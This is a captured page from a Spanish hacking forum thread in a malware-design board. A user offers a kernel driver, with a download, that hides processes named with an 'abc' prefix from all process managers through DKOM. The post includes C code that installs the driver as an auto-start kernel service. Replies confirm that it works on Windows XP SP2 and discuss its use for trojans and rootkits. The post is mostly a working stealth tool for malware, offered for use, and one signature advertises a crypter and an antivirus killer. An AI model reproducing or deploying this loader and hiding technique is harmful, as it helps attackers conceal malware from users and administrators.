elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
14 Febrero 2012, 06:37  


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderadores: Karcrack, [Zero])
| | |-+  Stealth Process Lab----- Coder ®®
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Stealth Process Lab----- Coder ®®  (Leído 3,861 veces)
byebye


Desconectado Desconectado

Mensajes: 5.094



Ver Perfil
Stealth Process Lab----- Coder ®®
« en: 28 Diciembre 2007, 16:22 »

Esta aplicacion esconde procesos de forma real, es decir no hay bucles que buscan en el taskmgr la cadena de nuestro proceso etc. no hay hooks, no hay bucles por lo que no hay mas consumo de cpu y no se alerta de forma alguna al usuario. de momento a dia de hoy y a esta misma hora solo soporta winxp. Gracias <~>FeRcHu<~> por las pruebas en SP2 ;), esperando que en breve soporte mas sistemas.

PD: añadir que lo esconde de cualquier administrador de procesos, no solo del taskmgr.

¿como lo uso?

una vez cargado no se necesita mas, escondera los procesos que empiecen por "abc" es decir si quiero esconder mi_ejecutable.exe lo tendre que renombrar a abcmiejecutable.exe. al reiniciar el sistema se iniciara automaticamente por lo que solo necesitamos ejecutar la rutina de instalacion una vez.

forma de cargarlo, que cada uno lo adapte al lenguaje que necesite:

Código:
#include <windows.h>

int main()
{
  HANDLE hM,hS;
  CHAR   Sn[]="PSDD"; //Nombre del servicio
  CHAR   S[]="C:\\Dev-Cpp\\cargar\\esconde.sys"; //path completo y nombre donde esta el archivo
 
  hM=OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
  hS=CreateService(hM,
                Sn,
                Sn,
                SERVICE_ALL_ACCESS,
                SERVICE_KERNEL_DRIVER,
                SERVICE_AUTO_START,
                SERVICE_ERROR_NORMAL,
                S,
                NULL,NULL,NULL,NULL,NULL);
  StartService(hS,0,NULL);
  CloseServiceHandle(hM);
  CloseServiceHandle(hS);             
  return 0;
}

« Última modificación: 29 Diciembre 2007, 02:57 por ®® » En línea
Man-In-the-Middle
Colaborador
***
Desconectado Desconectado

Mensajes: 3.634



Ver Perfil
Re: Stealth Process Lab----- Coder ®®
« Respuesta #1 en: 28 Diciembre 2007, 19:01 »

Criticas Constructivas AKI!
En línea
Thor


Desconectado Desconectado

Mensajes: 1.176


Ver Perfil
Re: Stealth Process Lab----- Coder ®®
« Respuesta #2 en: 28 Diciembre 2007, 19:39 »

Molaría tener el código del driver, aunque no se nada sobre programar drivers :S
Pero algún día dentro de infinitos años podría ser útil.

Saludos.
¿Sera una inocentada? Lo probaría pero es hora de lavarme los dientes.
« Última modificación: 28 Diciembre 2007, 20:04 por Thor » En línea
Ferсhu


Desconectado Desconectado

Mensajes: 1.213

Menos palabras y Mas codigos.


Ver Perfil WWW
Re: Stealth Process Lab----- Coder ®®
« Respuesta #3 en: 28 Diciembre 2007, 19:48 »

lo q hace es encubrir el proceso como servicio de windows??

si abren services.msc y finalizan "PSDD" se cierra??

El codigo del esconde.sys es privado no? o lo puedes poner??

edit: a q se debe q solo soporta sp1?? a limitaciones del codigo driver? x q no creo q explote bugs

Freze es toda la misma pregunta, y si ya lo baje eso pero quiero chusemar el codigo.

Citar
Criticas Constructivas AKI!

no pongan cosas, tipo "interesante", "lo bajo y lo pruebo", etc, etc. Creo q eso kiso decir Jesus r0x.
« Última modificación: 28 Diciembre 2007, 20:08 por <~>FeRcHu<~> » En línea

K-19


Desconectado Desconectado

Mensajes: 425


Sarah Wayne


Ver Perfil WWW
Re: Stealth Process Lab----- Coder ®®
« Respuesta #4 en: 28 Diciembre 2007, 19:54 »

esto no será a causa de lo comentado sobre que el lab no aporta nada de cara al publico???  :xD

igualmente buena herramienta. aunke no lo he probado.
En línea

Freeze.


Desconectado Desconectado

Mensajes: 2.731



Ver Perfil WWW
Re: Stealth Process Lab----- Coder ®®
« Respuesta #5 en: 28 Diciembre 2007, 19:54 »

Citar
El codigo del esconde.sys es privado no? o lo puedes poner??
Creo que hiciste la misma pregunta 2 veces :xD

Ps, no se si busbas el esconde.sys: * Esconde.rar (0.88 KB - descargado 71 veces.)

Si buscabas el source ps creo que es privado..! Ya sabia yo ¬¬



[broma]Me imagino las conversaciones por MSN:
- Mi General, los usuarios piden algo del Lab...
- Mandales el PEOR codigo que tengamos...
- Y si lo copian?
- Sacamos otro...! Y ya largate de mi cuartel ultramegarecontrasecreto.
- Pero señor estamos hablando por MSN
- No importa, largate..!!
[/broma]

Me pase hasta de inmaduto xD xD



Lamentablemente yo uso Win Xp SP2 y no me habia dado cuenta de que era solo para SP1 :xD
« Última modificación: 28 Diciembre 2007, 19:58 por ►Freeze » En línea

byebye


Desconectado Desconectado

Mensajes: 5.094



Ver Perfil
Re: Stealth Process Lab----- Coder ®®
« Respuesta #6 en: 28 Diciembre 2007, 20:07 »

Citar
lo q hace es encubrir el proceso como servicio de windows??

No, lo desvincula de la lista de procesos en el kernel.

Citar
si abren services.msc y finalizan "PSDD" se cierra??

de momento si, aunque es como todo si tu troyano se incicia desde el registro y yo lo veo lo quito y ya esta.

PD: ahora lo he mirado y en mi pc no sale en la lista de servicios. puedes confirmar que si sale?

Citar
El codigo del esconde.sys es privado no? o lo puedes poner??

si es privado, no por nada especial ya que no inventa nada nuevo, todo lo usado esta documentado.

Citar
edit: a q se debe q solo soporta sp1?? a limitaciones del codigo driver? x q no creo q explote bugs

se debe a estructuras del kernel que varian dependiendo del sistema.
« Última modificación: 28 Diciembre 2007, 20:19 por ®® » En línea
nhaalclkiemr


Desconectado Desconectado

Mensajes: 1.665


Máximo exponente 9DB9F1AEED2FADBDE 997BBE20FEDA92


Ver Perfil WWW
Re: Stealth Process Lab----- Coder ®®
« Respuesta #7 en: 29 Diciembre 2007, 05:22 »

Está buena la idea pero asta k funcione con Windows XP Profesional Sp2 no servirá para casi nada...

esto me da algunas ideas parfa rootkits jeje ;D

Saludos ;)
« Última modificación: 29 Diciembre 2007, 15:05 por nhaalclkiemr » En línea

StasFodidoCrypter 1.0 - 100% (old)
StasFodidoCrypter 2.0 - 85% (deserted)
Fire AV/FW-Killer - 97% (deserted)
R-WlanXDecrypter 0.9- 100%
Ferсhu


Desconectado Desconectado

Mensajes: 1.213

Menos palabras y Mas codigos.


Ver Perfil WWW
Re: Stealth Process Lab----- Coder ®®
« Respuesta #8 en: 29 Diciembre 2007, 05:28 »

Citar
Está buena la idea pero asta k funcione con Windows XP Sp2 no servirá para casi nada...

Ya Funciona, yo doy Fe  :xD
En línea

~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.983


Ver Perfil WWW
Re: Stealth Process Lab----- Coder ®®
« Respuesta #9 en: 29 Diciembre 2007, 11:26 »

Win XP SP2 Home Edition OK
Win Vista, pues era de esperar, ya q han modificado medio kernel, NO  :-[
En línea
Man-In-the-Middle
Colaborador
***
Desconectado Desconectado

Mensajes: 3.634



Ver Perfil
Re: Stealth Process Lab----- Coder ®®
« Respuesta #10 en: 29 Diciembre 2007, 18:43 »

Win XP SP2 Profesional OK
En línea
Eternal Idol


Desconectado Desconectado

Mensajes: 4.240


Clarin miente, TN opera y los giles regurgitan.


Ver Perfil WWW
Re: Stealth Process Lab----- Coder ®®
« Respuesta #11 en: 3 Enero 2008, 13:50 »

¿fu? Con dejar DriverUnload a 0 - como es por defecto - hay que reiniciar para descargarlo (ahora con net stop se puede hacer, aunque es una caracteristica muy util cuando uno todavia esta probando el codigo).
En línea



La economía nunca ha sido libre: o la controla el Estado en beneficio del Pueblo o lo hacen los grandes consorcios en perjuicio de éste.
Juan Domingo Perón.
byebye


Desconectado Desconectado

Mensajes: 5.094



Ver Perfil
Re: Stealth Process Lab----- Coder ®®
« Respuesta #12 en: 3 Enero 2008, 21:04 »

Citar
¿fu?

no es el fu. esta escrito desde 0 y si este que esta colgado para probar unas cosas usa la tecnica que se explica en toda la documentacion sobre dkom, pero el que tiene que salir (en su dia) usa otra de la que yo no he visto a dia de hoy documentacion almenos todo lo que pude leer no lo mencionaban y es mucho mas facil.
En línea
Eternal Idol


Desconectado Desconectado

Mensajes: 4.240


Clarin miente, TN opera y los giles regurgitan.


Ver Perfil WWW
Re: Stealth Process Lab----- Coder ®®
« Respuesta #13 en: 3 Enero 2008, 21:30 »

Citar
¿fu?

no es el fu. esta escrito desde 0 y si este que esta colgado para probar unas cosas usa la tecnica que se explica en toda la documentacion sobre dkom, pero el que tiene que salir (en su dia) usa otra de la que yo no he visto a dia de hoy documentacion almenos todo lo que pude leer no lo mencionaban y es mucho mas facil.

No dije que fuera el fu - mire rapidamente el desensamblado y lo depure un poco antes de escribir mi mensaje anterior - pero supongo que es la idea del fu ... sobre el cual discutimos en otro hilo no hace tanto tiempo.
En línea



La economía nunca ha sido libre: o la controla el Estado en beneficio del Pueblo o lo hacen los grandes consorcios en perjuicio de éste.
Juan Domingo Perón.
byebye


Desconectado Desconectado

Mensajes: 5.094



Ver Perfil
Re: Stealth Process Lab----- Coder ®®
« Respuesta #14 en: 3 Enero 2008, 22:42 »

si, raiz de ahi empece a buscar informacion sobre dkom ya que era mas limpio que hookear. exactamente lo saque de un pdf que me baje de google:

Citar
Taxonomy of Rootkits Submitted By Gaurav Bajaj

ya que aqui explica mas cosas y esta bastante completo. logicamente esto no lo he inventado yo jaja :).


En línea
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
ssh server stealth
Hacking Avanzado
Codename!! 0 257 Último mensaje 17 Agosto 2011, 18:00
por Codename!!
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines